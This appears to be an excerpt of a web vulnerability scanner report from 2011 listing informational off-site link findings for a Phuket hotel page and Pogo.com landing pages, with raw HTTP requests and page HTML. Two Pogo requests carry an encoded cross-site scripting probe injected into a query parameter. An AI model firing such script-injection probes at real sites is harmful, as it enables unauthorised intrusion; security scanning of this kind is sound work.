...[SNIP]...
<li><a href="http://www.japan-hotels.ws/osaka/">Osaka Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/japan/osaka-map.htm">Osaka Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.japan-hotels.ws/nagoya/">Nagoya</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/japan/nagoya/hotels/">Nagoya Hotels</a>
...[SNIP]...
<li><a href="http://www.japan-hotels.ws/nagoya/">Nagoya Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/japan/nagoya-map.htm">Nagoya Map</a>
...[SNIP]...
<li><a href="http://www.japan-hotels.ws/area-guides.htm">More...</a>
...[SNIP]...
<li><a href="http://www.india-hotel.net/">India</a>
...[SNIP]...
<li><a class="daddy" href="http://www.india-hotel.net/mumbai/">Mumbai</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/india/mumbai/">Mumbai Hotels</a>
...[SNIP]...
<li><a href="http://www.india-hotel.net/mumbai/">Mumbai Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/india/mumbai.htm">Mumbai Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.india-hotel.net/new-delhi/">New Delhi</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/india/delhi/">New Delhi Hotels</a>
...[SNIP]...
<li><a href="http://www.india-hotel.net/new-delhi/">New Delhi Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/india/new-delhi.htm">New Delhi Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.india-hotel.net/bangalore/">Bangalore</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/india/bangalore/">Bangalore Hotels</a>
...[SNIP]...
<li><a href="http://www.india-hotel.net/bangalore/">Bangalore Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/india/bangalore.htm">Bangalore Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.india-hotel.net/chennai/">Chennai</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/india/chennai/">Chennai Hotels</a>
...[SNIP]...
<li><a href="http://www.india-hotel.net/chennai/">Chennai Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/india/chennai.htm">Chennai Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/">Philippines</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/manila/">Manila</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/philippines/manila/">Manila Hotels</a>
...[SNIP]...
<li><a href="http://www.philippines-hotels.ws/manila/">Manila Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/philippines/manila.htm">Manila Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/boracay-island/">Boracay Island</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/philippines/boracay/">Boracay Island Hotels</a>
...[SNIP]...
<li><a href="http://www.philippines-hotels.ws/boracay-island/">Boracay Island Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/philippines/boracay-island.htm">Boracay Island Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/cebu-city/">Cebu City</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/philippines/cebu/">Cebu City Hotels</a>
...[SNIP]...
<li><a href="http://www.philippines-hotels.ws/cebu-city/">Cebu City Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/philippines/cebu-city.htm">Cebu City Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/bohol-island/">Bohol Island</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/philippines/bohol/">Bohol Island Hotels</a>
...[SNIP]...
<li><a href="http://www.philippines-hotels.ws/bohol-island/">Bohol Island Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/philippines/bohol-island.htm">Bohol Island Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.philippines-hotels.ws/mactan-island/">Mactan Island</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/philippines/cebu/">Mactan Island Hotels</a>
...[SNIP]...
<li><a href="http://www.philippines-hotels.ws/mactan-island/">Mactan Island Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/philippines/mactan-island.htm">Mactan Island Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.maldives-resorts.net/">Maldives</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maldives/">Maldives Hotels</a>
...[SNIP]...
<li><a href="http://www.maldives-resorts.net/">Maldives Guide</a>
...[SNIP]...
<li><a href="http://www.go-seychelles.com/">Seychelles</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/seychelles/">Seychelles Hotels</a>
...[SNIP]...
<li><a href="http://www.go-seychelles.com/">Seychelles Guide</a>
...[SNIP]...
<li><a class="daddy" href="http://www.srilanka-hotels.ws/">Sri Lanka</a>
...[SNIP]...
<li><a class="daddy" href="http://www.srilanka-hotels.ws/colombo/">Colombo</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/sri-lanka/colombo/hotels/">Colombo Hotels</a>
...[SNIP]...
<li><a href="http://www.srilanka-hotels.ws/colombo/">Colombo Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/sri-lanka/colombo.htm">Colombo Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.srilanka-hotels.ws/galle/">Galle</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/sri-lanka/galle/hotels/">Galle Hotels</a>
...[SNIP]...
<li><a href="http://www.srilanka-hotels.ws/galle/">Galle Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/sri-lanka/galle.htm">Galle Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.srilanka-hotels.ws/kandy/">Kandy</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/sri-lanka/kandy/hotels/">Kandy Hotels</a>
...[SNIP]...
<li><a href="http://www.srilanka-hotels.ws/kandy/">Kandy Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/sri-lanka/kandy.htm">Kandy Map</a>
...[SNIP]...
<li><a href="http://www.srilanka-hotels.ws/area-guides.htm">More...</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net" rel="nofollow">Taiwan</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/taipei/" rel="nofollow">Taipei</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/hotels/taipei.htm" rel="nofollow">Taipei Hotels</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/taipei/" rel="nofollow">Taipei Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/taiwan/taipei/map/" rel="nofollow">Taipei Map</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/hsinchu/" rel="nofollow">Hsinchu</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/hotels/hsinchu.htm" rel="nofollow">Hsinchu Hotels</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/hsinchu/" rel="nofollow">Hsinchu Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/taiwan/hsinchu/map/" rel="nofollow">Hsinchu Map</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/yilan/" rel="nofollow">Yilan</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/hotels/yilan.htm" rel="nofollow">Yilan Hotels</a>
...[SNIP]...
<li><a href="http://www.taiwan-hotels.net/yilan/" rel="nofollow">Yilan Guide</a>
...[SNIP]...
<li><a href="http://hotels.asiawebdirect.com/taiwan/yilan/map/" rel="nofollow">Yilan Map</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/" rel="nofollow">Korea</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/seoul/" rel="nofollow">Seoul</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/hotels/seoul.htm" rel="nofollow">Seoul Hotels</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/seoul/" rel="nofollow">Seoul Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/south-korea/seoul/map/" rel="nofollow">Seoul Map</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/busan/" rel="nofollow">Busan</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/hotels/busan.htm" rel="nofollow">Busan Hotels</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/busan/" rel="nofollow">Busan Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/south-korea/busan/map/" rel="nofollow">Busan Map</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/jeju/" rel="nofollow">Jeju</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/hotels/jeju.htm" rel="nofollow">Jeju Hotels</a>
...[SNIP]...
<li><a href="http://www.korea-hotels.net/jeju/" rel="nofollow">Jeju Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/south-korea/jeju/map/" rel="nofollow">Jeju Map</a>
...[SNIP]...
<td><a class="first" href="http://www.phuket.com/" target="_blank">Phuket</a>
...[SNIP]...
<td><a class="" href="http://www.phuket.com/hotels/" target="_blank">Hotels</a>
...[SNIP]...
<td><a class="" href="http://www.phuket-maps.com/" target="_blank">Maps</a>
...[SNIP]...
<td><a class="" href="http://www.phuket-photos.com/" target="_blank">Photos</a>
...[SNIP]...
<td><a class="" href="http://www.forum.asiawebdirect.com/" target="_blank">Forum</a>
...[SNIP]...
<td valign="top">


<a href="http://www.tropicalphuket.com/" target="_blank"><img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/headerFlags/0/image/flag062.gif" /></a>
...[SNIP]...
<div id="topbar"><img class="top-left-corner"
       src="http://static.asiawebdirect.com/portals/images/cnr-top-left.gif" />
   <table cellpadding="0" cellspacing="0" border="0" width="100%"
       align="center">
...[SNIP]...
<td class="first" width="204px">
               <a href="http://www.asiawebdirect.com" target="_blank">
                   <img src="http://static.asiawebdirect.com/portals/images/topbar-logo.gif" id="topbarlogo" style="visibility: hidden" />
               </a>
...[SNIP]...
<td>
               <a target="_blank" href="https://secure.latestays.com/signup/">Add Your Hotel</a>
...[SNIP]...
</script>
               <a onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" href="http://www.addthis.com/bookmark.php">Bookmark</a>
               <script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...
<td width="230px">
               <a target="_blank" href="http://www.asiawebdirect.com/signup.htm">Join our Free Newsletter</a>
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://static.asiawebdirect.com/portals/js/portals-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd/1/H.17--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
18.57. http://www.phuket.com/andamanwhitebeach/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /andamanwhitebeach/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /andamanwhitebeach/?pid=AWDINP1314 HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.2.10.1308921638; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 31599
Set-Cookie: JSESSIONID=B277BFEFC6287630084D8F375D858853; Path=/
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="htt
...[SNIP]...
<link rel="canonical" href="http://www.phuket.com/andamanwhitebeach/" />

<link rel="stylesheet" href="http://static.asiawebdirect.com/premium/css/premium-hotel-layout.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://static.asiawebdirect.com/m/global/premium-themes/grey.css" type="text/css" media="screen" />
<!--[if lt IE 7]>
...[SNIP]...
<div id="logo">
           
               <img src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/topLogo/logo1.gif" height="52" alt="Andaman White Beach Resort" width="178" />
           
           
    </div>
...[SNIP]...
</h2>


<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0"
width="600"
height="320">
<param name="movie" value="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/hotelBanner/andaman-white-beach.swf" />
...[SNIP]...
<param name="wmode" value="transparent" />
<embed src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/hotelBanner/andaman-white-beach.swf"
quality="high"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash" width="600" height="320" wmode="transparent"> </embed>
...[SNIP]...
<a href="http://www.phuket.com/hotel/recommendations-beach-resorts/" target="_blank">
   
    <img src="http://static.asiawebdirect.com/m/global/premium-rosettes/best-beach-resorts--phuket-/rosette/image/beach-resort.png" style="border: 0;" />
   
       </a>
...[SNIP]...
</select>
<img style="cursor:pointer;vertical-align:middle;" src="http://static.asiawebdirect.com/portals/images/calendar.gif" onClick="javascript:prefixYear(2);opencalendar('dd/mm/yyyy',getElcheckavailabilityShort('txtCheck_InShort'),this,'showChangeDateShort(\'in\');', event.x, event.y);return false;">
</td>
...[SNIP]...
</select>
<img style="cursor:pointer;vertical-align:middle;" src="http://static.asiawebdirect.com/portals/images/calendar.gif" size="10" onClick="javascript:prefixYear(2);opencalendar('dd/mm/yyyy',getElcheckavailabilityShort('txtCheck_OutShort'),this,'showChangeDateShort(\'out\');', event.x, event.y);return false;">
</td>
...[SNIP]...
<div id="Layer1" style="position: absolute; width: 147px; height: 210px; z-index: 1;"><a href="http://www.latestays.com/andaman-white-beach/" target="_blank"><img src="http://www.latestays.com/images/webdirect/space.gif" border="0" height="210" width="100%"></a>
...[SNIP]...
<div align="center"><img src="http://www.latestays.com/images/webdirect/latestays90.gif" width="120" height="48"></div>
...[SNIP]...
<br />
   <img width="16" height="13" src="http://static.asiawebdirect.com/premium/images/star.gif" /><img width="16" height="13" src="http://static.asiawebdirect.com/premium/images/star.gif" /><img width="16" height="13" src="http://static.asiawebdirect.com/premium/images/star.gif" /><img width="16" height="13" src="http://static.asiawebdirect.com/premium/images/star.gif" />
   <br />
...[SNIP]...
<div id="big-booking-title"><img src="http://static.asiawebdirect.com/portals/images/big-box-logo.gif" />Room Quick Finder</div>
...[SNIP]...
<div id="homepage-right">
   
   
       <img src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/rightColumn/logo/logo2.gif" />
   
   <a href="http://www.phuket.com/andamanwhitebeach/rooms.htm"><img src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/rightColumn/image1/pic01.jpg" height="100" width="150" class="homepage-right-image" /></a>
...[SNIP]...
<a href="http://www.phuket.com/andamanwhitebeach/facilities.htm">
       
   
       <img src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/rightColumn/image2/pic02.jpg" height="100" width="150" class="homepage-right-image" />
       
           
       </a>
...[SNIP]...
<a href="http://www.phuket.com/andamanwhitebeach/dining.htm">
       
   
       <img src="http://static.asiawebdirect.com/m/phuket/hotels/phuket-com/andamanwhitebeach/rightColumn/image3/pic03.jpg" height="100" width="150" class="homepage-right-image" />
       
           
       </a>
...[SNIP]...
<br />


<a href="http://www.latestays.com/andaman-white-beach/">Last Minute Bookings</a>
...[SNIP]...
<b> <a href="http://www.andagraf.com/" target="_blank" class="contacttext">Web
Design</a>
...[SNIP]...
</b>For any queries or information, <a onclick="this.href=this.href+'&page='+document.URL" target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/?lang=en">contact us HERE</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.asiawebdirect.com" target="_blank"><img src="http://www.bali-indonesia.com/images/awd-white.gif" border="0" vMeetingsce="5" width="110" height="50"></a>
...[SNIP]...
<br>
<a href="http://www.phuket-travel.com/" class="contactlink" target="_blank"><b>
...[SNIP]...
</a>
| <a href="http://www.phuket-photos.com/" class="contactlink" target="_blank">Phuket Photos</a>
...[SNIP]...
</a>
| <a href="http://www.phuket-maps.com/" class="contactlink" target="_blank">Maps</a>
...[SNIP]...
<li>

<a class="sub" href="http://www.latestays.com/andaman-white-beach/">Last Minute Bookings</a>
...[SNIP]...
<td><img height="20" src="http://www.bangkok.com/images/004b1a.gif"/></td>
...[SNIP]...
<td><img height="20" src="http://www.bangkok.com/images/004b1a.gif"/></td>
    <td><a onclick="this.href=this.href+'&page='+document.URL" target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/?lang=en">Contact Us</a>
...[SNIP]...
<td><img height="20" src="http://www.bangkok.com/images/004b1a.gif"/></td>
...[SNIP]...
<td><img height="20" src="http://www.bangkok.com/images/004b1a.gif"/></td>
...[SNIP]...
<!-- AddThis Button BEGIN -->
    <a onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" href="http://www.addthis.com/bookmark.php?v=250&amp;pub=j0hnsmith"><img width="125" height="16" style="border: 0pt none ;" alt="Bookmark and Share" src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif"/></a>
    <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=j0hnsmith" type="text/javascript"></script>
...[SNIP]...
<td><img height="20" src="http://www.bangkok.com/images/004b1a.gif"/></td>
...[SNIP]...
</div>
    <script src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</div>


    <script type="text/javascript" src="http://static.asiawebdirect.com/premium/js/premium-hotel-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd/1/H.17--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
18.58. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1308922304648-New%7C1311514304648%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 12416


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1295694527"></iframe>
...[SNIP]...
18.59. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 12361


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1787957212"></iframe>
...[SNIP]...
18.60. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
